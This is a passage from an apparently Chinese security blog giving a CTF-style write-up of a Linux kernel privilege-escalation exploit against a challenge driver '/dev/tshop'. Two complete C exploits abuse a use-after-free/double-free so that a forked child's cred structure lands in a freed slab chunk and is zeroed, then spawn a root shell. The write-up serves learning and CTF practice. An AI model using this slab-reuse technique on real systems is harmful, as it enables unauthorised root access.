<h2><span id="exploit-加固">Exploit 加固</span></h2><p>由于panic的核心原因在于把 cred info 当作地址来申请堆块，那么在这个方向思考的话，其实可以通过一个free的写指针操作把 cred info 覆盖为一个有效的 chunk 地址，也就是free链表的尾 chunk 地址。<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"> * main.c</span><br><span class="line"> * Copyright (C) 2019 P1umer &lt;cz18811105578@gmail.com&gt;</span><br><span class="line"> */</span><br><span class="line">// gcc exp.c -o exp --static -lpthread</span><br><span class="line">#define _GNU_SOURCE</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;sys/ioctl.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/types.h&gt;</span><br><span class="line">#include &lt;sys/stat.h&gt;</span><br><span class="line">#include &lt;fcntl.h&gt;</span><br><span class="line">#include &lt;sys/mman.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;errno.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;signal.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;sys/syscall.h&gt;</span><br><span class="line">#include &lt;linux/userfaultfd.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;poll.h&gt;</span><br><span class="line">#include &lt;linux/prctl.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#define MALLOC 0x271A</span><br><span class="line">#define FREE   0x2766</span><br><span class="line">#define EDIT1  0x1A0A</span><br><span class="line">#define EDIT2  0x22B8 </span><br><span class="line">pid_t pid;</span><br><span class="line"></span><br><span class="line">void debug()&#123;</span><br><span class="line">    getchar();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main(int argc, char *argv[])&#123;</span><br><span class="line">    int fd = open(&quot;/dev/tshop&quot;,0);</span><br><span class="line">    debug();</span><br><span class="line">    ioctl(fd,MALLOC,0);</span><br><span class="line">    ioctl(fd,MALLOC,1);</span><br><span class="line">    ioctl(fd,MALLOC,2);</span><br><span class="line">    ioctl(fd,MALLOC,3);</span><br><span class="line">    ioctl(fd,MALLOC,4);</span><br><span class="line">    ioctl(fd,MALLOC,5);</span><br><span class="line">    ioctl(fd,MALLOC,6);</span><br><span class="line">    ioctl(fd,MALLOC,7);</span><br><span class="line">    ioctl(fd,MALLOC,8);</span><br><span class="line">    ioctl(fd,MALLOC,9);</span><br><span class="line">    ioctl(fd,MALLOC,10);</span><br><span class="line">    ioctl(fd,MALLOC,11);</span><br><span class="line">    ioctl(fd,MALLOC,12);</span><br><span class="line">    ioctl(fd,MALLOC,13);</span><br><span class="line">    ioctl(fd,MALLOC,14);</span><br><span class="line">    ioctl(fd,MALLOC,15);</span><br><span class="line">    ioctl(fd,MALLOC,16);</span><br><span class="line">    ioctl(fd,MALLOC,17);</span><br><span class="line">    </span><br><span class="line">    ioctl(fd,FREE,17);</span><br><span class="line">    ioctl(fd,FREE,16);</span><br><span class="line">    ioctl(fd,FREE,17);</span><br><span class="line"></span><br><span class="line">    pid=fork();</span><br><span class="line"></span><br><span class="line">    if(pid==0)&#123;</span><br><span class="line">        sleep(1);</span><br><span class="line">        printf(&quot;[+] root&quot;);</span><br><span class="line">        system(&quot;whoami&quot;);</span><br><span class="line">        system(&quot;/bin/sh&quot;);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line"></span><br><span class="line">        printf(&quot;[+] shell close&quot;);</span><br><span class="line">        ioctl(fd,FREE,17);</span><br><span class="line">        ioctl(fd,MALLOC,17);</span><br><span class="line"></span><br><span class="line">        ioctl(fd,MALLOC,16);</span><br><span class="line">        ioctl(fd,MALLOC,17);//cred==0 </span><br><span class="line"></span><br><span class="line">        ioctl(fd,FREE,0);</span><br><span class="line">        ioctl(fd,FREE,1);</span><br><span class="line">        ioctl(fd,FREE,2);</span><br><span class="line">        ioctl(fd,FREE,3);</span><br><span class="line">        ioctl(fd,FREE,4);</span><br><span class="line">        ioctl(fd,FREE,5);</span><br><span class="line">        ioctl(fd,FREE,6);</span><br><span class="line">        ioctl(fd,FREE,7);</span><br><span class="line">        ioctl(fd,FREE,8);</span><br><span class="line">        ioctl(fd,FREE,9);</span><br><span class="line">        ioctl(fd,FREE,10);</span><br><span class="line">        ioctl(fd,FREE,11);</span><br><span class="line">        ioctl(fd,FREE,12);</span><br><span class="line">        ioctl(fd,FREE,13);</span><br><span class="line">        ioctl(fd,FREE,14);</span><br><span class="line">        ioctl(fd,FREE,15);</span><br><span class="line">        sleep(100);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>主进程通过 UAF 再次把 chunk17 free 了一次，复写里面的Cred info 为 chunk16 的地址，然后再次申请堆块把链表恢复为原状态。同时在父进程中加了sleep函数提高稳定性。</p>
<p>这时候已经得到了稳定的 root shell :)<br><img src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/20190515013535.png" alt></p>
<h2><span id="更多的思考">更多的思考</span></h2><p>还有一种更为精简的解法, 从一开始没有考虑 doublefree ：<br><figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;sys/ioctl.h&gt;</span><br><span class="line">#include &lt;sys/types.h&gt;</span><br><span class="line">#include &lt;sys/stat.h&gt;</span><br><span class="line">#include &lt;fcntl.h&gt;</span><br><span class="line"></span><br><span class="line">#define DEL         0x2766</span><br><span class="line">#define SET_ZEGE     0x22B8  // 0x123456789ABCDEF0LL</span><br><span class="line">#define ALLOC         0x271A</span><br><span class="line">#define SET_JIGE     0x1A0A  // 0xFEDCBA987654321LL</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">    int fd = open(&quot;/dev/tshop&quot;, 0);</span><br><span class="line">    size_t heap_addr , kernel_addr,mod_addr;</span><br><span class="line">    if (fd &lt; 0) &#123;</span><br><span class="line">        printf(&quot;[-] bad open /dev/tshop\n&quot;);</span><br><span class="line">        exit(-1);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ioctl(fd, ALLOC, 0);</span><br><span class="line">    ioctl(fd, ALLOC, 1);</span><br><span class="line">    ioctl(fd, DEL, 0);</span><br><span class="line">    ioctl(fd, DEL, 1);</span><br><span class="line">    int pid=fork();</span><br><span class="line">    ioctl(fd, DEL, 1);</span><br><span class="line">    ioctl(fd, ALLOC, 3);</span><br><span class="line">    //getchar();</span><br><span class="line">    //getchar();</span><br><span class="line">    if (pid &lt; 0) &#123;</span><br><span class="line">        puts(&quot;[-] fork error!&quot;);</span><br><span class="line">        exit(0);</span><br><span class="line">    &#125; else if (pid == 0) &#123;</span><br><span class="line">        if (getuid() == 0) &#123;</span><br><span class="line">            puts(&quot;[+] root&quot;);</span><br><span class="line">            system(&quot;cat /home/sunichi/flag&quot;);</span><br><span class="line">            system(&quot;id&quot;);</span><br><span class="line">            system(&quot;/bin/sh&quot;)</span><br><span class="line">            exit(0);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        sleep(30);</span><br><span class="line">        puts(&quot;[+] parent exit&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>具体思路：</p>
<ul>
<li>alloc并free掉两块内存，使他们接入slab cache链表的尾部，这里暂且给它编号为chunk0和chunk1</li>
<li>由于采用FIFO算法，此时slab缓存的单向链表最尾端的chunk为chunk1，而且第一个8字节存储的是指向chunk0的指针，当ALLOC新cache时，将优先取出chunk1分配给进程。</li>
<li>fork一个子进程，这个子进程的cred结构体会复用此前我们free掉的内存块（chunk1）<br>此时，堆块中的cred如下：<br><img src="https://t3ls.club/usr/uploads/2019/05/4059141535.png" alt></li>
<li>我们的目标是将cred的id位置零，首先就需要再次拿到cred所在堆块（chunk1）</li>
<li>free并立即进行alloc操作，chunk1就会挂到cache链上后再次被申请回来。</li>
<li>由于ALLOC操作伴随着所在堆块数据的初始化，于是我们不用再有多余的操作便能将cred结构体uid及gid位置零。此时子进程就已成功提权（root）<br><img src="https://t3ls.club/usr/uploads/2019/05/2160439120.png" alt></li>
</ul>

        </div>
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/Kernel/">Kernel</a>
                </div>
            </div>
        </div>
        
        
        
        <div class="bdsharebuttonbox">
    <a href="#" class="bds_more" data-cmd="more"></a>
    <a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a>
    <a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
    <a href="#" class="bds_tqq" data-cmd="tqq" title="分享到腾讯微博"></a>
    <a href="#" class="bds_renren" data-cmd="renren" title="分享到人人网"></a>
    <a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a>
</div>
<script>window._bd_share_config = { "common": { "bdSnsKey": {}, "bdText": "", "bdMini": "2", "bdPic": "", "bdStyle": "0", "bdSize": "16" }, "share": {} }; with (document) 0[(getElementsByTagName('head')[0] || body).appendChild(createElement('script')).src = 'http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion=' + ~(-new Date() / 36e5)];</script>
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2019/07/03/V8-Optimize-FrameState/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">V8 Optimize: FrameState</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2019/05/06/Star-CTF-OOB-writeup/">
                <span class="level-item">StarCTF OOB writeup</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">Comments</h3>
        
<div id="lv-container" data-id="city" data-uid="MTAyMC8zODMxMi8xNDg0MA==">
    <script type="text/javascript">
        (function(d, s) {
            var j, e = d.getElementsByTagName(s)[0];

            if (typeof LivereTower === 'function') { return; }

            j = d.createElement(s);
            j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
            j.async = true;

            e.parentNode.insertBefore(j, e);
        })(document, 'script');
    </script>
    <noscript> Please activate JavaScript for write a comment in LiveRe</noscript>
</div>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left ">
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                        <figure class="image is-128x128 has-mb-6">
                            <img class="is-rounded" src="/images/111.png" alt="P1umer">
                        </figure>
                    
                    
                    <p class="is-size-4 is-block">
                        P1umer
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        Security Researcher
                    </p>
                    
                    
                    <p class="is-size-6 is-flex is-flex-center has-text-grey">
                        <i class="fas fa-map-marker-alt has-mr-7"></i>
                        <span>ADLab</span>
                    </p>
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        Posts
                    </p>
                    <p class="title has-text-weight-normal">
                        10
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        Categories
                    </p>
                    <p class="title has-text-weight-normal">
                        6
                    </p>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        Tags
                    </p>
                    <p class="title has-text-weight-normal">
                        7
                    </p>
                </div>
            </div>
        </nav>
        <div class="level">
            <a class="level-item button is-link is-rounded" href="https://www.zhihu.com/people/cz11-96/activities" target="_blank">
                Follow</a>
        </div>
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank" title="zhihu" href="https://www.zhihu.com/people/cz11-96/activities">
                
                <i class="fab fa-zhihu"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        
    
        

<div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            Links
        </h3>
        <ul class="menu-list">
        
            <li>
                <a class="level is-mobile" href="https://q1iq.github.io/" target="_blank">
                    <span class="level-left">
                        <span class="level-item">Q1iq</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">q1iq.github.io</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://dwfault-blog.imwork.net:30916/" target="_blank">
                    <span class="level-left">
                        <span class="level-item">dwfault</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">dwfault-blog.imwork.net</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://p4nda.top/" target="_blank">
                    <span class="level-left">
                        <span class="level-item">p4nda</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">p4nda.top</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://eternalsakura13.com/" target="_blank">
                    <span class="level-left">
                        <span class="level-item">Sakura</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">eternalsakura13.com</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://misty.moe/" target="_blank">
                    <span class="level-left">
                        <span class="level-item">Misty</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">misty.moe</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="https://t3ls.club" target="_blank">
                    <span class="level-left">
                        <span class="level-item">T3ls</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">t3ls.club</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://litch1.clu" target="_blank">
                    <span class="level-left">
                        <span class="level-item">Litch1</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">litch1.clu</span>
                    </span>
                </a>
            </li>
        
        </ul>
        </div>
    </div>
</div>


    
        
<div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                Categories
            </h3>
            <ul class="menu-list">
            <li>
        <a class="level is-marginless" href="/categories/Browser-Explore/">
            <span class="level-start">
                <span class="level-item">Browser Explore</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">7</span>
            </span>
        </a><ul><li>
        <a class="level is-marginless" href="/categories/Browser-Explore/Basic/">
            <span class="level-start">
                <span class="level-item">Basic</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">3</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Browser-Explore/Exploit/">
            <span class="level-start">
                <span class="level-item">Exploit</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">2</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Browser-Explore/optimize/">
            <span class="level-start">
                <span class="level-item">optimize</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">2</span>
            </span>
        </a></li></ul></li><li>
        <a class="level is-marginless" href="/categories/Linux-Kernel/">
            <span class="level-start">
                <span class="level-item">Linux Kernel</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/fuzz/">
            <span class="level-start">
                <span class="level-item">fuzz</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">2</span>
            </span>
        </a></li>
            </ul>
        </div>
    </div>
</div>
    
        
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            Tag Cloud
        </h3>
        <a href="/tags/Basic/" style="font-size: 15px;">Basic</a> <a href="/tags/Browser-Explore/" style="font-size: 20px;">Browser Explore</a> <a href="/tags/Exploit/" style="font-size: 12.5px;">Exploit</a> <a href="/tags/Fuzz/" style="font-size: 12.5px;">Fuzz</a> <a href="/tags/Kernel/" style="font-size: 10px;">Kernel</a> <a href="/tags/V8/" style="font-size: 17.5px;">V8</a> <a href="/tags/optimize/" style="font-size: 12.5px;">optimize</a>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen ">
        
            
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            Recent
        </h3>
        
        <article class="media">
            
            <a href="/2019/08/05/How2Exploit-The-V8-Typer-Bug/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="How2Exploit The V8 Typer Bug">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-08-05T05:54:44.000Z">2019-08-05</time></div>
                    <a href="/2019/08/05/How2Exploit-The-V8-Typer-Bug/" class="has-link-black-ter is-size-6">How2Exploit The V8 Typer Bug</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/Exploit/">Exploit</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/07/04/V8-Optimize-Reduce-Node-Inline/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/SalcombeDevon_ZH-CN5806331292_1920x1080.jpg" alt="V8 Optimize: Reduce Node &amp;&amp; Inline">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-07-04T12:47:23.000Z">2019-07-04</time></div>
                    <a href="/2019/07/04/V8-Optimize-Reduce-Node-Inline/" class="has-link-black-ter is-size-6">V8 Optimize: Reduce Node &amp;&amp; Inline</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/optimize/">optimize</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/07/03/V8-Optimize-FrameState/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/HKreuni_ZH-CN5683726370_1920x1080.jpg" alt="V8 Optimize: FrameState">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-07-02T19:48:19.000Z">2019-07-03</time></div>
                    <a href="/2019/07/03/V8-Optimize-FrameState/" class="has-link-black-ter is-size-6">V8 Optimize: FrameState</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/optimize/">optimize</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/05/30/Linux Kernel 初探/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/PeruvianRainforest_ZH-CN4066508593_1920x1080.jpg" alt="Linux Kernel 初探（一）BabyKernel">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-05-30T14:04:29.000Z">2019-05-30</time></div>
                    <a href="/2019/05/30/Linux Kernel 初探/" class="has-link-black-ter is-size-6">Linux Kernel 初探（一）BabyKernel</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Linux-Kernel/">Linux Kernel</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/05/06/Star-CTF-OOB-writeup/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/TreeFrog_ZH-CN9016355758_1920x1080.jpg" alt="StarCTF OOB writeup">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-05-06T14:04:29.000Z">2019-05-06</time></div>
                    <a href="/2019/05/06/Star-CTF-OOB-writeup/" class="has-link-black-ter is-size-6">StarCTF OOB writeup</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/Exploit/">Exploit</a>
                    </p>
                </div>
            </div>
        </article>
        
    </div>
</div>

        
            <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            Archives
        </h3>
        <ul class="menu-list">
        
        <li>
            <a class="level is-marginless" href="/archives/2019/08/">
                <span class="level-start">
                    <span class="level-item">August 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/07/">
                <span class="level-start">
                    <span class="level-item">July 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/05/">
                <span class="level-start">
                    <span class="level-item">May 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/03/">
                <span class="level-start">
                    <span class="level-item">March 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/02/">
                <span class="level-start">
                    <span class="level-item">February 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/09/">
                <span class="level-start">
                    <span class="level-item">September 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/07/">
                <span class="level-start">
                    <span class="level-item">July 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        </ul>
        </div>
    </div>
</div>
        
            <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                Tags
            </h3>
            <div class="field is-grouped is-grouped-multiline">
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Basic/">
                        <span class="tag">Basic</span>
                        <span class="tag is-grey">3</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Browser-Explore/">
                        <span class="tag">Browser Explore</span>
                        <span class="tag is-grey">7</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Exploit/">
                        <span class="tag">Exploit</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Fuzz/">
                        <span class="tag">Fuzz</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Kernel/">
                        <span class="tag">Kernel</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/V8/">
                        <span class="tag">V8</span>
                        <span class="tag is-grey">4</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/optimize/">
                        <span class="tag">optimize</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
            </div>
        </div>
    </div>
</div>
        
        </div>
    
</div>

                




<div class="column is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only has-order-3 column-right ">
    
        
<div class="card widget">
    <div class="card-content">
        <h3 class="menu-label">
            Recent
        </h3>
        
        <article class="media">
            
            <a href="/2019/08/05/How2Exploit-The-V8-Typer-Bug/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="/images/thumbnail.svg" alt="How2Exploit The V8 Typer Bug">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-08-05T05:54:44.000Z">2019-08-05</time></div>
                    <a href="/2019/08/05/How2Exploit-The-V8-Typer-Bug/" class="has-link-black-ter is-size-6">How2Exploit The V8 Typer Bug</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/Exploit/">Exploit</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/07/04/V8-Optimize-Reduce-Node-Inline/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/SalcombeDevon_ZH-CN5806331292_1920x1080.jpg" alt="V8 Optimize: Reduce Node &amp;&amp; Inline">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-07-04T12:47:23.000Z">2019-07-04</time></div>
                    <a href="/2019/07/04/V8-Optimize-Reduce-Node-Inline/" class="has-link-black-ter is-size-6">V8 Optimize: Reduce Node &amp;&amp; Inline</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/optimize/">optimize</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/07/03/V8-Optimize-FrameState/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/HKreuni_ZH-CN5683726370_1920x1080.jpg" alt="V8 Optimize: FrameState">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-07-02T19:48:19.000Z">2019-07-03</time></div>
                    <a href="/2019/07/03/V8-Optimize-FrameState/" class="has-link-black-ter is-size-6">V8 Optimize: FrameState</a>
                    <p class="is-size-7 is-uppercase">
